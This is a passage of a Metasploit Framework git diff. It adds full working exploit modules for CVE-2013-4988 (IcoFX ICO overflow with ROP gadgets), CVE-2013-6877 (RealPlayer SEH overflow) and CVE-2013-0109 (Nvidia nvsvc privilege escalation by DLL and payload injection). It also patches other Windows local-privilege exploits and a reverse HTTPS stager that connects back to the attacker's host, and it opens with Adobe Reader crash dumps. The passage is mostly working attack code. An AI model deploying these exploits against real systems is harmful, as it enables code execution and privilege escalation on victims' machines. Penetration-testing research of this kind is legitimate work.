eol + + pdf << "%%EOF" << eol + pdf + end + +end + + +=begin + +* crash Adobe Reader 10.1.4 + +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 +eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 +AcroRd32_60000000!PDFLTerm+0xbb7cd: +604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? + +* crash Adobe Reader 11.0.2 + +(940.d70): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll - +eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 +eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 +AcroRd32_60000000!DllCanUnloadNow+0x1493ae: +60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? + +=end diff --git a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb index 8459e51f16..d88342567f 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote eos - texml = texml.gsub(/^\t\t/,'') + texml = texml.gsub(/^ {4}/,'') print_status("Creating '#{datastore['FILENAME']}'.") file_create(texml) diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb new file mode 100644 index 0000000000..1def45cf42 --- /dev/null +++ b/modules/exploits/windows/fileformat/icofx_bof.rb @@ -0,0 +1,108 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'IcoFX Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability in version 2.1 + of IcoFX. The vulnerability exists while parsing .ICO files, where an specially + crafted ICONDIR header, providing an arbitrary long number of images into the file, + can be used to trigger the overflow when reading the ICONDIRENTRY structures. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Marcos Accossatto', # Vulnerability discovery, poc + 'juan vazquez' # Metasploit + ], + 'References' => + [ + [ 'CVE', '2013-4988' ], + [ 'OSVDB', '100826' ], + [ 'BID', '64221' ], + [ 'EDB', '30208'], + [ 'URL', 'http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability' ] + ], + 'Platform' => [ 'win' ], + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 864, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Targets' => + [ + [ 'IcoFX 2.5 / Windows 7 SP1', + { + :callback => :target_win7, + } + ], + ], + 'DisclosureDate' => 'Dec 10 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ico']) + ], self.class) + + end + + def target_win7 + # All the gadgets com from IcoFX2.exe 2.5.0.0 + + # ICONDIR structure + ico = [0].pack("v") # Reserved. Must always be 0 + ico << [1].pack("v") # Image type: 1 for icon (.ico) image + # 0x66 is enough to overwrite the local variables and, finally + # the seh handler. 0x7f00 is used to trigger an exception after + # the overflow, while the overwritten SEH handler is in use. + ico << [0x7f00].pack("v") + # ICONDIRENTRY structures 102 structures are using to overwrite + # every structure = 16 bytes + # 100 structures are used to reach the local variables + ico << rand_text(652) + ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods + ico << [0x0045cc21].pack("V") # jmp esp + ico << payload.encoded + ico << rand_text( + 1600 - # 1600 = 16 ICONDIRENTRY struct size * 100 + 652 - # padding to align the stack pivot + 80 - # rop nops size + 4 - # jmp esp pointer size + payload.encoded.length + ) + # The next ICONDIRENTRY allows to overwrite the interesting local variables + # on the stack + ico << [2].pack("V") # Counter (remaining bytes) saved on the stack + ico << rand_text(8) # Padding + ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler + # The next ICONDIRENTRY allows to overwrite the seh handler + ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret + ico << rand_text(0xc) # padding + return ico + end + + def exploit + unless self.respond_to?(target[:callback]) + fail_with(Failure::BadConfig, "Invalid target specified: no callback function defined") + end + + ico = self.send(target[:callback]) + + print_status("Creating '#{datastore['FILENAME']}' file...") + file_create(ico) + end + +end diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 085f137f33..b36117d8f4 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote BODY - body = body.gsub(/^\t\t/, '') + body = body.gsub(/^ {4}/, '') if request["Depth"].to_i > 0 if path.scan("/").length < 2 @@ -233,7 +233,7 @@ class Metasploit3 < Msf::Exploit::Remote SHARE - share = share.gsub(/^\t\t/, '') + share = share.gsub(/^ {4}/, '') return share end @@ -275,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote FILES end - files = files.gsub(/^\t\t\t/, '') + files = files.gsub(/^ {6}/, '') return files end @@ -316,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote HTML - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') file_create(html) print_status("#{datastore['FILENAME']} must be run locally in order to execute our payload") diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index c84847b2f4..d467f0ba61 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote end - p = p.gsub(/^\t\t\t/, '') + p = p.gsub(/^ {6}/, '') return p end diff --git a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb new file mode 100644 index 0000000000..9ebc12853b --- /dev/null +++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb @@ -0,0 +1,90 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'RealNetworks RealPlayer Version Attribute Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability in + version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by + improper bounds checking of the version and encoding attributes inside + the XML declaration. + + By persuading the victim to open a specially-crafted .RMP file, a + remote attacker could execute arbitrary code on the system or cause + the application to crash. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gabor Seljan' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-6877' ], + [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ] + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'seh' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x22", + 'Space' => 532, + }, + 'Targets' => + [ + [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51', + { + 'OffsetClick' => 2540, # Open via double click + 'OffsetMenu' => 13600, # Open via File -> Open + 'Ret' => 0x641930C8 # POP POP RET from rpap3260.dll + } + ], + [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32', + { + 'OffsetClick' => 2540, # Open via double click + 'OffsetMenu' => 13600, # Open via File -> Open + 'Ret' => 0x63A630B8 # POP POP RET from rpap3260.dll + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 20 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp']) + ], + self.class) + + end + + def exploit + + sploit = rand_text_alpha_upper(target['OffsetClick']) + sploit << generate_seh_payload(target.ret) + sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length) + sploit << generate_seh_payload(target.ret) + sploit << rand_text_alpha_upper(17000) # Generate exception + + # Create the file + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create("") + + end +end + diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index 345994ab70..4e415858c6 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote exec("#{fname}"); ?> | - php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ') + php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ') return php end diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index bac8ced7a7..e9e4017905 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -19,10 +19,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP LoadRunner EmulationAdmin Web Service Directory Traversal', 'Description' => %q{ - This module exploits a directory traversal vulnerability on the version 11.52 of HP - LoadRunner. The vulnerability exists on the EmulationAdmin web service, specifically - in the copyFileToServer method, allowing to upload arbitrary files. This module has - been tested successfully on HP LoadRunner 11.52 over Windows 2003 SP2. + This module exploits a directory traversal vulnerability in version 11.52 of HP + LoadRunner. The vulnerability exists in the EmulationAdmin web service, specifically + in the copyFileToServer method, allowing the upload of arbitrary files. This module has + been tested successfully on HP LoadRunner 11.52 on Windows 2003 SP2. }, 'Author' => [ diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index 40256e55fe..636f60f378 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb @@ -172,19 +172,6 @@ class Metasploit3 < Msf::Exploit::Local irpstuff << rand_text_alpha(231) if not this_proc.memory.writable?(0x1000) - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE") end if not this_proc.memory.writable?(0x1000) @@ -261,31 +248,6 @@ class Metasploit3 < Msf::Exploit::Local return end - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ] - ]) - print_status("Triggering AFDJoinLeaf pointer overwrite...") result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index 0b9a32f593..cef0f217a2 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -18,17 +18,17 @@ class Metasploit3 < Msf::Exploit::Local 'Name' => 'Microsoft Windows ndproxy.sys Local Privilege Escalation', 'Description' => %q{ This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 - SP2 systems, exploited on the wild on November 2013. The vulnerability exists while + SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used - to unsafely access an array, and the value is used to perform a call, leading to a NULL - pointer dereference, which is exploitable on both Windows XP and Windows 2003 systems. This + to access an array unsafely, and the value is used to perform a call, leading to a NULL + pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Unkwnon', # Vulnerability discovery + 'Unknown', # Vulnerability discovery 'ryujin', # python PoC 'Shahin Ramezany', # C PoC 'juan vazquez' # MSF module @@ -87,44 +87,6 @@ class Metasploit3 < Msf::Exploit::Local end def add_railgun_functions - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], - [ "PDWORD", "Interval", "out" ] - ]) session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', @@ -150,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Local invalid_handle_value = 0xFFFFFFFF - r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", 0, 0) + r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0) handle = r['return'] @@ -234,7 +196,14 @@ class Metasploit3 < Msf::Exploit::Local windir = expand_path("%windir%") cmd = "#{windir}\\System32\\notepad.exe" # run hidden - proc = session.sys.process.execute(cmd, nil, {'Hidden' => true }) + begin + proc = session.sys.process.execute(cmd, nil, {'Hidden' => true }) + rescue Rex::Post::Meterpreter::RequestError + # when running from the Adobe Reader sandbox: + # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied. + return nil + end + return proc.pid end @@ -424,9 +393,14 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::Unknown, "The exploitation wasn't successful") end + p = payload.encoded print_good("Exploitation successful! Creating a new process and launching payload...") new_pid = create_proc - p = payload.encoded + + if new_pid.nil? + print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...") + return + end print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...") if execute_shellcode(p, nil, new_pid) @@ -435,6 +409,7 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::Unknown, "Error while executing the payload") end + end end diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb index 77f1fccadd..a219d3905b 100644 --- a/modules/exploits/windows/local/novell_client_nicm.rb +++ b/modules/exploits/windows/local/novell_client_nicm.rb @@ -67,44 +67,6 @@ class Metasploit3 < Msf::Exploit::Local end def add_railgun_functions - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], - [ "PDWORD", "Interval", "out" ] - ]) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb index cd46a57950..ac5f8f5407 100644 --- a/modules/exploits/windows/local/novell_client_nwfs.rb +++ b/modules/exploits/windows/local/novell_client_nwfs.rb @@ -63,44 +63,6 @@ class Metasploit3 < Msf::Exploit::Local end def add_railgun_functions - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], - [ "PDWORD", "Interval", "out" ] - ]) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb new file mode 100644 index 0000000000..33223ce462 --- /dev/null +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -0,0 +1,168 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/windows/priv' +require 'msf/core/post/windows/process' +require 'msf/core/post/windows/reflective_dll_injection' +require 'msf/core/post/windows/services' + +class Metasploit3 < Msf::Exploit::Local + Rank = AverageRanking + + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::Windows::ReflectiveDLLInjection + include Msf::Post::Windows::Services + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', + 'Description' => %q{ + The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to + interact with the service. It contains a stacked based buffer overflow as a result + of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe', + the service name is 'nvsvc', and the named pipe is 'nsvr'. + + This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. + It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Peter Wintersmith', # Original exploit + 'Ben Campbell ', # Metasploit integration + ], + 'Arch' => ARCH_X86_64, + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Targets' => + [ + [ 'Windows x64', { } ] + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true, + 'BadChars' => "\x00" + }, + 'References' => + [ + [ 'CVE', '2013-0109' ], + [ 'OSVDB', '88745' ], + [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ], + ], + 'DisclosureDate' => 'Dec 25 2012', + 'DefaultTarget' => 0 + })) + + end + + def check + vuln_hashes = [ + '43f91595049de14c4b61d1e76436164f', + '3947ad5d03e6abcce037801162fdb90d', + '3341d2c91989bc87c3c0baa97c27253b' + ] + + os = sysinfo["OS"] + if os =~ /windows/i + svc = service_info 'nvsvc' + if svc and svc['Name'] =~ /NVIDIA/i + vprint_good("Found service '#{svc['Name']}'") + + begin + if is_running? + print_good("Service is running") + else + print_error("Service is not running!") + end + rescue RuntimeError => e + print_error("Unable to retrieve service status") + end + + if sysinfo['Architecture'] =~ /WOW64/i + path = svc['Command'].gsub('"','').strip + path.gsub!("system32","sysnative") + else + path = svc['Command'].gsub('"','').strip + end + + begin + hash = client.fs.file.md5(path).unpack('H*').first + rescue Rex::Post::Meterpreter::RequestError => e + print_error("Error checking file hash: #{e}") + return Exploit::CheckCode::Detected + end + + if vuln_hashes.include?(hash) + vprint_good("Hash '#{hash}' is listed as vulnerable") + return Exploit::CheckCode::Vulnerable + else + vprint_status("Hash '#{hash}' is not recorded as vulnerable") + return Exploit::CheckCode::Detected + end + else + return Exploit::CheckCode::Safe + end + end + end + + def is_running? + begin + status = service_status('nvsvc') + return (status and status[:state] == 4) + rescue RuntimeError => e + print_error("Unable to retrieve service status") + return false + end + end + + def exploit + if is_system? + fail_with(Exploit::Failure::None, 'Session is already elevated') + end + + unless check == Exploit::CheckCode::Vulnerable + fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") + end + + print_status("Launching notepad to host the exploit...") + + windir = expand_path("%windir%") + cmd = "#{windir}\\SysWOW64\\notepad.exe" + process = client.sys.process.execute(cmd, nil, {'Hidden' => true}) + host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS) + print_good("Process #{process.pid} launched.") + + print_status("Reflectively injecting the exploit DLL into #{process.pid}...") + library_path = ::File.join(Msf::Config.data_directory, + "exploits", + "CVE-2013-0109", + "nvidia_nvsvc.x86.dll") + library_path = ::File.expand_path(library_path) + + print_status("Injecting exploit into #{process.pid} ...") + exploit_mem, offset = inject_dll_into_process(host_process, library_path) + + print_status("Exploit injected. Injecting payload into #{process.pid}...") + payload_mem = inject_into_process(host_process, payload.encoded) + + # invoke the exploit, passing in the address of the payload that + # we want invoked on successful exploitation. + print_status("Payload injected. Executing exploit...") + host_process.thread.create(exploit_mem + offset, payload_mem) + + print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.") + end +end + diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb index 9fc4e1f9b0..d4d563a13a 100644 --- a/modules/exploits/windows/misc/itunes_extm3u_bof.rb +++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote HTML_REDIR - ie_redir = ie_redir.gsub(/^\t\t\t/, '') + ie_redir = ie_redir.gsub(/^ {6}/, '') return ie_redir end diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 92e5925f49..63ca919ef1 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -179,7 +179,7 @@ class Metasploit3 < Msf::Exploit::Remote BODY - body = body.gsub(/^\t\t/, '') + body = body.gsub(/^ {4}/, '') if request["Depth"].to_i > 0 if path.scan("/").length < 2 @@ -242,7 +242,7 @@ class Metasploit3 < Msf::Exploit::Remote SHARE - share = share.gsub(/^\t\t/, '') + share = share.gsub(/^ {4}/, '') return share end @@ -284,7 +284,7 @@ class Metasploit3 < Msf::Exploit::Remote FILES end - files = files.gsub(/^\t\t\t/, '') + files = files.gsub(/^ {6}/, '') return files end @@ -311,7 +311,7 @@ class Metasploit3 < Msf::Exploit::Remote os.execute(#{var_temp_name}) LUA - lua_script = lua_script.gsub(/^\t\t/, '') + lua_script = lua_script.gsub(/^ {4}/, '') return lua_script end diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 5129f8f8d3..121bb1b81a 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote exec("#{fname}"); ?> | - php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ') + php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ') return php end diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb index 40f493d28c..4b3ddc68f4 100644 --- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb +++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb @@ -211,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending malicious page") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index f58fe98552..7700f50f8c 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb @@ -216,7 +216,8 @@ class Metasploit3 < Msf::Exploit::Remote :password => pass, :port => datastore['RPORT'], :timeout => 1, - :proxies => datastore['Proxies'] + :proxies => datastore['Proxies'], + :config => false }) ::Timeout.timeout(1) {ssh.close} rescue nil diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index ee06071d32..5c490fb7b7 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -132,11 +132,7 @@ module Metasploit3 p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V") # patch the LPORT - unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0 - lport = datastore['HIDDENPORT'] - else - lport = datastore['LPORT'] - end + lport = bind_port lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444 p[lportloc+1] = [lport.to_i].pack('V')[0] @@ -146,11 +142,7 @@ module Metasploit3 # append LHOST and return payload - unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty? - lhost = datastore['HIDDENHOST'] - else - lhost = datastore['LHOST'] - end + lhost = bind_address p + lhost.to_s + "\x00" end @@ -161,5 +153,33 @@ module Metasploit3 def wfs_delay 20 end + +protected + + def bind_port + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + end diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index 81d278da64..deca1e26d7 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -30,6 +30,6 @@ module Metasploit3 end def library_path - File.join(Msf::Config.data_directory, "vncdll.dll") + File.join(Msf::Config.data_directory, "vncdll.x86.dll") end end diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index fda5611bcc..db5b645ffe 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -11,11 +11,11 @@ class Metasploit3 < Msf::Post def 